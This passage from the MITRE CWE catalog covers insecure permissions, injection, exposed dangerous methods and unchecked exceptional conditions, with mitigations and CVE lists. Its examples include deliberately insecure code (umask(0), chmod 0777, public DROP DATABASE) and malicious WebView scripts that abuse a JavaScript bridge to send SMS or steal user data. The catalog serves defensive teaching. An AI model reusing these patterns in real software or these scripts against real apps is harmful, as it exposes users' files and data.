active session. - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Manual Static Analysis - Manual static analysis may be effective in detecting the use of custom permissions models and functions. The code could then be examined to identifying usage of the related functions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software. - - - Manual Dynamic Analysis - Manual dynamic analysis may be effective in detecting the use of custom permissions models and functions. The program could then be executed with a focus on exercising code paths that are related to the custom permissions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software. - - - Fuzzing - Fuzzing is not effective in detecting this weakness. - - - Black Box - - Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process and watch for library functions or system calls on OS resources such as files, directories, and shared memory. Examine the arguments to these calls to infer which permissions are being used. - - Note that this technique is only useful for permissions issues related to system resources. It is not likely to detect application-level business rules that are related to permissions, such as if a user of a blog system marks a post as "private," but the blog system inadvertently marks it as "public." - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Inter-application Flow Analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Host Application Interface Scanner - - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - Automated Monitored Execution - Forced Path Execution - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Implementation - When using a critical resource such as a configuration file, check to see if the resource has insecure permissions (such as being modifiable by any regular user) [REF-62], and generate an error or even exit the software if there is a possibility that the resource could have been modified by an unauthorized party. - - - Architecture and Design - Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully defining distinct user groups, privileges, and/or roles. Map these against data, functionality, and the related resources. Then set the permissions accordingly. This will allow you to maintain more fine-grained control over your resources. [REF-207] - Moderate - This can be an effective strategy. However, in practice, it may be difficult or time consuming to define these areas when there are many different resources or user types, or if the applications features change rapidly. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - Implementation - Installation - During program startup, explicitly set the default permissions or umask to the most restrictive setting possible. Also set the appropriate permissions during program installation. This will prevent you from inheriting insecure permissions from any user who installs or runs the program. - High - - - System Configuration - For all configuration files, executables, and libraries, make sure that they are only readable and writable by the software's administrator. - High - - - Documentation - Do not suggest insecure configuration changes in documentation, especially if those configurations can extend to resources and other programs that are outside the scope of the application. - - - Installation - Do not assume that a system administrator will manually change the configuration to the settings that are recommended in the software's manual. - - - Operation - System Configuration - Environment Hardening - Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software. - - - - - The following code sets the umask of the process to 0 before creating a file and writing "Hello world" into the file. - - #define OUTFILE "hello.out" - umask(0);FILE *out; - /* Ignore CWE-59 (link following) for brevity */ - - out = fopen(OUTFILE, "w");if (out) {fprintf(out, "hello world!\n");fclose(out);} - - After running this program on a UNIX system, running the "ls -l" command might return the following output: - - -rw-rw-rw- 1 username 13 Nov 24 17:58 hello.out - - The "rw-rw-rw-" string indicates that the owner, group, and world (all users) can read the file and write to it. - - - This code creates a home directory for a new user, and makes that user the owner of the directory. If the new directory cannot be owned by the user, the directory is deleted. - - function createUserDir($username){$path = '/home/'.$username;if(!mkdir($path)){return false;}if(!chown($path,$username)){rmdir($path);return false;}return true;} - - Because the optional "mode" argument is omitted from the call to mkdir(), the directory is created with the default permissions 0777. Simply setting the new user as the owner of the directory does not explicitly change the permissions of the directory, leaving it with the default. This default allows any user to read and write to the directory, allowing an attack on the user's files. The code also fails to change the owner group of the directory, which may result in access by unexpected groups. - This code may also be vulnerable to Path Traversal (CWE-22) attacks if an attacker supplies a non alphanumeric username. - - - The following code snippet might be used as a monitor to periodically record whether a web site is alive. To ensure that the file can always be modified, the code uses chmod() to make the file world-writable. - - $fileName = "secretFile.out"; - if (-e $fileName) {chmod 0777, $fileName;} - my $outFH;if (! open($outFH, ">>$fileName")) {ExitError("Couldn't append to $fileName: $!");}my $dateString = FormatCurrentTime();my $status = IsHostAlive("cwe.mitre.org");print $outFH "$dateString cwe status: $status!\n";close($outFH); - - The first time the program runs, it might create a new file that inherits the permissions from its environment. A file listing might look like: - - -rw-r--r-- 1 username 13 Nov 24 17:58 secretFile.out - - This listing might occur when the user has a default umask of 022, which is a common setting. Depending on the nature of the file, the user might not have intended to make it readable by everyone on the system. - The next time the program runs, however - and all subsequent executions - the chmod will set the file's permissions so that the owner, group, and world (all users) can read the file and write to it: - - -rw-rw-rw- 1 username 13 Nov 24 17:58 secretFile.out - - Perhaps the programmer tried to do this because a different process uses different permissions that might prevent the file from being updated. - - - The following command recursively sets world-readable permissions for a directory and all of its children: - - chmod -R ugo+r DIRNAME - - If this command is run from a program, the person calling the program might not expect that all the files under the directory will be world-readable. If the directory is expected to contain private data, this could become a security problem. - - - - - CVE-2009-3482 - Anti-virus product sets insecure "Everyone: Full Control" permissions for files under the "Program Files" folder, allowing attackers to replace executables with Trojan horses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3482 - - - CVE-2009-3897 - Product creates directories with 0777 permissions at installation, allowing users to gain privileges and access a socket used for authentication. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3897 - - - CVE-2009-3489 - Photo editor installs a service with an insecure security descriptor, allowing users to stop or start the service, or execute commands as SYSTEM. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3489 - - - CVE-2020-15708 - socket created with insecure permissions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15708 - - - CVE-2009-3289 - Library function copies a file to a new target and uses the source file's permissions for the target, which is incorrect when the source file is a symbolic link, which typically has 0777 permissions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3289 - - - CVE-2009-0115 - Device driver uses world-writable permissions for a socket file, allowing attackers to inject arbitrary commands. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0115 - - - CVE-2009-1073 - LDAP server stores a cleartext password in a world-readable file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1073 - - - CVE-2009-0141 - Terminal emulator creates TTY devices with world-writable permissions, allowing an attacker to write to the terminals of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0141 - - - CVE-2008-0662 - VPN product stores user credentials in a registry key with "Everyone: Full Control" permissions, allowing attackers to steal the credentials. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0662 - - - CVE-2008-0322 - Driver installs its device interface with "Everyone: Write" permissions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322 - - - CVE-2009-3939 - Driver installs a file with world-writable permissions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939 - - - CVE-2009-3611 - Product changes permissions to 0777 before deleting a backup; the permissions stay insecure for subsequent backups. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3611 - - - CVE-2007-6033 - Product creates a share with "Everyone: Full Control" permissions, allowing arbitrary program execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6033 - - - CVE-2007-5544 - Product uses "Everyone: Full Control" permissions for memory-mapped files (shared memory) in inter-process communication, allowing attackers to tamper with a session. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5544 - - - CVE-2005-4868 - Database product uses read/write permissions for everyone for its shared memory, allowing theft of credentials. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4868 - - - CVE-2004-1714 - Security product uses "Everyone: Full Control" permissions for its configuration files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1714 - - - CVE-2001-0006 - "Everyone: Full Control" permissions assigned to a mutex allows users to disable network connectivity. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0006 - - - CVE-2002-0969 - Chain: database product contains buffer overflow that is only reachable through a .ini configuration file - which has "Everyone: Full Control" permissions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0969 - - - - - FIO03-J - Create files with appropriate access permission - - - SEC01-J - Do not allow tainted variables in privileged blocks - - - ENV03-J - Do not grant dangerous combinations of permissions - - - FIO06-C - Create files with appropriate access permissions - - - - - - - - - - - - - - - - - - - - - - - The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). - - - - CWE Content Team - MITRE - 2008-09-08 - new weakness-focused entry for Research view. - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Detection_Factors, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Relationships - - Insecure Permission Assignment for Resource - Insecure Permission Assignment for Critical Resource - - - - The developer builds a security-critical protection mechanism into the software, but the compiler optimizes the program such that the mechanism is removed or modified. - - - - - - - - - - - Access Control - Other - Bypass Protection Mechanism - Other - - - - - Black Box - This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others. - - - White Box - This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler. - - - - - CVE-2008-1685 - C compiler optimization, as allowed by specifications, removes code that is used to perform checks to detect integer overflows. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1685 - - - CVE-2019-1010006 - Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006 - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2008-10-01 - new weakness-focused entry for Research view closes the gap between 14 and 435. - - - CWE Content Team - MITRE - 2008-11-24 - updated Detection_Factors - - - CWE Content Team - MITRE - 2009-03-10 - updated Applicable_Platforms, Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples - - - - - The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. - Software has certain assumptions about what constitutes data and control respectively. It is the lack of verification of these assumptions for user-controlled input that leads to injection problems. Injection problems encompass a wide variety of issues -- all mitigated in very different ways and usually attempted in order to alter the control flow of the process. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Confidentiality - Read Application Data - Many injection attacks involve the disclosure of important information -- in terms of both data sensitivity and usefulness in further exploitation. - - - Access Control - Bypass Protection Mechanism - In some cases, injectable code controls authentication; this may lead to a remote vulnerability. - - - Other - Alter Execution Logic - Injection attacks are characterized by the ability to significantly change the flow of a given process, and in some cases, to the execution of arbitrary code. - - - Integrity - Other - Other - Data injection attacks lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. - - - Non-Repudiation - Hide Activities - Often the actions performed by injected control code are unlogged. - - - - - Requirements - Programming languages and supporting technologies might be chosen which are not subject to these issues. - - - Implementation - Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input. - - - - - Injection problem ('data' used as something else) - - - A6 - Injection Flaws - CWE More Specific - - - SFP24 - Tainted input to command - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Many people treat injection only as an input validation problem (CWE-20) because many people do not distinguish between the consequence/attack (injection) and the protection mechanism that prevents the attack from succeeding. However, input validation is only one potential protection mechanism (output encoding is another), and there is a chaining relationship between improper input validation and the improper enforcement of the structure of messages to other components. Other issues not directly related to input validation, such as race conditions, could similarly impact message structure. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Name, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationship_Notes, Relationships, Theoretical_Notes - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns, Relationships - - Injection - Failure to Sanitize Data into a Different Plane (aka 'Injection') - Failure to Sanitize Data into a Different Plane ('Injection') - - - - The software provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted. - - This weakness can lead to a wide variety of resultant weaknesses, depending on the behavior of the exposed method. It can apply to any number of technologies and approaches, such as ActiveX controls, Java functions, IOCTLs, and so on. - The exposure can occur in a few different ways: - - 1) The function/method was never intended to be exposed to outside actors. - 2) The function/method was only intended to be accessible to a limited set of actors, such as Internet-based access from a single web site. - - - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - Low - - - Integrity - Confidentiality - Availability - Access Control - Other - Gain Privileges or Assume Identity - Read Application Data - Modify Application Data - Execute Unauthorized Code or Commands - Other - Exposing critical functionality essentially provides an attacker with the privilege level of the exposed functionality. This could result in the modification or exposure of sensitive data or possibly even execution of arbitrary code. - - - - - Architecture and Design - If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities. - - - Architecture and Design - Implementation - Attack Surface Reduction - - Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be: - - - accessible to all users - restricted to a small set of privileged users - prevented from being directly accessible at all - - - Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting. - - - - - - In the following Java example the method removeDatabase will delete the database with the name specified in the input parameter. - - public void removeDatabase(String databaseName) { - try { - Statement stmt = conn.createStatement();stmt.execute("DROP DATABASE " + databaseName); - - } catch (SQLException ex) {...} - } - - The method in this example is declared public and therefore is exposed to any class in the application. Deleting a database should be considered a critical operation within an application and access to this potentially dangerous method should be restricted. Within Java this can be accomplished simply by declaring the method private thereby exposing it only to the enclosing class as in the following example. - - private void removeDatabase(String databaseName) { - try { - Statement stmt = conn.createStatement();stmt.execute("DROP DATABASE " + databaseName); - - } catch (SQLException ex) {...}} - - - - - - These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application: - - - // Android - @Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){ - if (url.substring(0,14).equalsIgnoreCase("examplescheme:")){if(url.substring(14,25).equalsIgnoreCase("getUserInfo")){writeDataToView(view, UserData);return false;}else{return true;}} - } - - - - // iOS - -(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{ - NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@"exampleScheme"]){ - NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@"specialFunction"]){ - - - // Make data available back in webview. - UIWebView *webView = [self writeDataToView:[URL query]]; - }return NO; - }return YES; - } - - A call into native code can then be initiated by passing parameters within the URL: - - window.location = examplescheme://method?parameter=value - - Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site. - - - This application uses a WebView to display websites, and creates a Javascript interface to a Java object to allow enhanced functionality on a trusted website: - - public class WebViewGUI extends Activity { - WebView mainWebView; - public void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);mainWebView = new WebView(this);mainWebView.getSettings().setJavaScriptEnabled(true);mainWebView.addJavascriptInterface(new JavaScriptInterface(), "userInfoObject");mainWebView.loadUrl("file:///android_asset/www/index.html");setContentView(mainWebView);} - final class JavaScriptInterface { - JavaScriptInterface () {} - public String getUserInfo() {return currentUser.Info();} - } - } - - Before Android 4.2 all methods, including inherited ones, are exposed to Javascript when using addJavascriptInterface(). This means that a malicious website loaded within this WebView can use reflection to acquire a reference to arbitrary Java objects. This will allow the website code to perform any action the parent application is authorized to. - For example, if the application has permission to send text messages: - - <script>userInfoObject.getClass().forName('android.telephony.SmsManager').getMethod('getDefault',null).sendTextMessage(attackNumber, null, attackMessage, null, null);</script> - - This malicious script can use the userInfoObject object to load the SmsManager object and send arbitrary text messages to any recipient. - - - After Android 4.2, only methods annotated with @JavascriptInterface are available in JavaScript, protecting usage of getClass() by default, as in this example: - - final class JavaScriptInterface { - JavaScriptInterface () { } - @JavascriptInterfacepublic String getUserInfo() {return currentUser.Info();} - } - - This code is not vulnerable to the above attack, but still may expose user info to malicious pages loaded in the WebView. Even malicious iframes loaded within a trusted page may access the exposed interface: - - <script>var info = window.userInfoObject.getUserInfo();sendUserInfo(info);</script> - - This malicious code within an iframe is able to access the interface object and steal the user's data. - - - - - CVE-2007-6382 - arbitrary Java code execution via exposed method - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6382 - - - CVE-2007-1112 - security tool ActiveX control allows download or upload of files - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1112 - - - - - - - - Under-reported and under-studied. This weakness could appear in any technology, language, or framework that allows the programmer to provide a functional interface to external parties, but it is not heavily reported. In 2007, CVE began showing a notable increase in reports of exposed method vulnerabilities in ActiveX applications, as well as IOCTL access to OS-level resources. These weaknesses have been documented for Java applications in various secure programming sources, but there are few reports in CVE, which suggests limited awareness in most parts of the vulnerability research community. - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2009-01-12 - updated Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2010-02-16 - updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Exposed Insecure Method or Function - - - - The software does not adequately filter user-controlled input for special elements with control implications. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Confidentiality - Availability - Modify Application Data - Execute Unauthorized Code or Commands - - - - - Requirements - Programming languages and supporting technologies might be chosen which are not subject to these issues. - - - Implementation - Utilize an appropriate mix of allowlist and denylist parsing to filter special element syntax from all input. - - - - - Special Element Injection - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Special Element Injection - - - - The software does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software. - - The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer's assumptions, possibly introducing instability, incorrect behavior, or a vulnerability. - Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions. - - - - - - - - - Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function. - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Integrity - Availability - DoS: Crash, Exit, or Restart - Unexpected State - The data which were produced as a result of a function call could be in a bad state upon return. If the return value is not checked, then this bad data may be used in operations, possibly leading to a crash or other unintended behaviors. - - - - - Automated Static Analysis - Automated static analysis may be useful for detecting unusual conditions involving system resources or common programming idioms, but not for violations of business rules. - Moderate - - - Manual Dynamic Analysis - Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248). - - - - Implementation - Check the results of all functions that return a value and verify that the value is expected. - High - Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. - - - Implementation - If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248). - High - Using specific exceptions, and ensuring that exceptions are checked, helps programmers to anticipate and appropriately handle many unusual events that could occur. - - - Implementation - - Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. - If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. - Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. - Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS. - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and 